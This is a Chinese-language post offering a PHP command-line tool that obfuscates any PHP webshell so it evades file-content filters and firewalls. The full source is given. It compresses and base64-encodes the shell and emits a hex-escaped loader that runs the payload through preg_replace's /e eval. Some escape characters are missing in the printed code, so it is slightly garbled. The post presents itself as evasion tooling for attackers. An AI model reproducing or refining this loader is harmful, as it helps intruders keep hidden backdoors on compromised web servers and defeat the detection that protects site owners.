lostwolf写的
这不是webshell,只是个webshell免杀工具
切勿当初webshell使用
仅限免杀phpwebshell
该工具运行在 cli 模式!
如果有无法突破的文件内容过滤 可尝试下用这个工具 免杀大马!
任意php webshell 通过此工具编码之后可以饶过国内一些bt的防火墙
复制代码 代码如下:
<?php
/*
Title: PHP shell nokill T00L
Blog: exploit-db.blogcn.com
*/
error_reporting(0);
@ini_set('memory_limit','-1');
set_time_limit(0);
$toolname="$argv[0]";
if ($argc<2) {
baner($toolname);
die;
}
$input_file= trim($argv[1]);
$output_file='nokill_'.$input_file;
if (file_exists($input_file)) {
No_kill_c0de($input_file,$output_file);
echo "PHP shell nokill T00Lrn";
echo "Blog: exploit-db.blogcn.comrn";
echo "Input: {$input_file}rn";
$file_full_path=dirname(__FILE__).DIRECTORY_SEPARATOR.$output_file;
echo "[+] Generate success!rn";
echo "Saved to {$file_full_path}"."rn";
} else {
echo "PHP shell nokill T00Lrn";
echo "Blog: exploit-db.blogcn.comrn";
die("[-] Failed ! The File $input_file does not exist");
}
function No_kill_c0de($input_file,$output_file){
$no_whitespace=php_strip_whitespace($input_file);
$no_php_tag=trim(trim(trim($no_whitespace,'<?php'),'<?'),'?>');
$enfile=base64_encode(gzdeflate($no_php_tag));
$shellcode="x3cx3fx70x68x70xdxa";
$shellcode.='$enfile='.'"'."{$enfile}".'"'.';'."xdxa";
$shellcode.="x24x62x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x66x27x2cx22x22x2cx22x62x66x61x66x73x66x65x66x36x66x34x66x5fx66x66x64x66x66x65x66x66x63x66x66x6fx66x66x64x66x66x65x66x22x29x3bxdxax24x67x3dx73x74x72x5fx72x65x70x6cx61x63x65x28x27x58x27x2cx27x27x2cx27x67x58x58x7ax58x58x69x58x58x6ex58x58x58x58x66x58x58x58x6cx58x58x61x58x58x58x74x58x58x58x58x58x65x27x29x3bxdxax70x72x65x67x5fx72x65x70x6cx61x63x65x28x27x5cx27x61x5cx27x65x69x73x27x2cx27x65x27x2ex27x76x27x2ex27x61x27x2ex27x6cx27x2ex27x28x24x67x28x24x62x28x24x65x6ex66x69x6cx65x29x29x29x27x2cx27x61x27x29x3bxdxa";
$shellcode.="x3fx3e";
file_put_contents("$output_file",$shellcode);
}
function baner($toolname){
echo "PHP shell nokill T00Lrn";
echo "Blog: exploit-db.blogcn.comrn";
echo "Usage: {$toolname} phpwebshellrn";
}
?>